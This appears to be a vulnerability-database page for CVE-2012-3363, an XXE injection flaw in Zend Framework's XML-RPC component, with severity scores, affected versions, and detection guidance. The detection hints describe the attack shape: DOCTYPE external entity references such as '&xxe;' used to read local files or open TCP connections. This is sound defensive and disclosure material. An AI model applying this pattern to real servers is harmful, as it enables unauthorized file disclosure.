cbcvebase.
CVE-2012-3363
published 2013-02-13

CVE-2012-3363: Zend_XmlRpc in Zend Framework 1.x before 1.11.12 and 1.12.x before 1.12.0 does not properly handle SimpleXMLElement classes, which allows remote attackers to…

PriorityP278critical9.1CVSS 3.1
AVNACLPRNUINSUCHIHAN
EXPLOIT
EPSS
50.25%
98.8th percentile
Zend_XmlRpc in Zend Framework 1.x before 1.11.12 and 1.12.x before 1.12.0 does not properly handle SimpleXMLElement classes, which allows remote attackers to read arbitrary files or create TCP connections via an external entity reference in a DOCTYPE element in an XML-RPC request, aka an XML external entity (XXE) injection attack.

Affected

63 ranges· showing 25
VendorProductVersion rangeFixed in
debiandebian_linux
fedoraprojectfedora
fedoraprojectfedora
zendzend_framework
zendzend_framework
zendzend_framework
zendzend_framework
zendzend_framework
zendzend_framework
zendzend_framework
zendzend_framework
zendzend_framework
zendzend_framework
zendzend_framework
zendzend_framework
zendzend_framework
zendzend_framework
zendzend_framework
zendzend_framework
zendzend_framework
zendzend_framework
zendzend_framework
zendzend_framework
zendzend_framework
zendzend_framework

Detection & IOCsextracted from sources · hover to see the quote

pathZend\XmlRpc\Request.php
pathZend\XmlRpc\Response.php
pathZend\XmlRpc\Server.php
urlhttp://framework.zend.com/security/advisory/ZF2012-01
  • Detect HTTP POST requests to XML-RPC endpoints containing a DOCTYPE element with an external entity reference (XXE payload) targeting local files or TCP connections.
  • Look for XML-RPC POST requests whose body contains both a DOCTYPE declaration and an entity reference (e.g., &xxe;) — the canonical XXE injection pattern used against Zend_XmlRpc.
  • Flag absence of libxml_disable_entity_loader() call before SimpleXMLElement instantiation in PHP code as a vulnerable code pattern for this CVE.
  • Monitor for XML-RPC requests to Moodle web services endpoints that carry DOCTYPE/external entity payloads, as Moodle's bundled Zend library is also affected.
  • ·The vulnerability affects both the XML-RPC server and client code paths; detection/patching must cover both Request.php and Response.php, not just the server-side handler.
  • ·Older Zend Framework branches (prior to 1.11.x and 1.12.x) are also affected but will not receive official fixes; environments running those branches require manual remediation or upgrade.
  • ·Any third-party software that bundles or depends on the Zend XmlRpc package inherits this vulnerability and must be patched independently (e.g., Moodle).
  • ·CVE-2012-3363 is distinct from CVE-2012-6531, which covers Zend_Dom, Zend_Feed, and Zend_Soap; both CVEs share the same XXE root cause but affect different components.

CVSS provenance

nvdv3.19.1CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
nvdv2.06.4MEDIUMAV:N/AC:L/Au:N/C:P/I:P/A:N
ghsa9.1CRITICAL
osv9.1CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.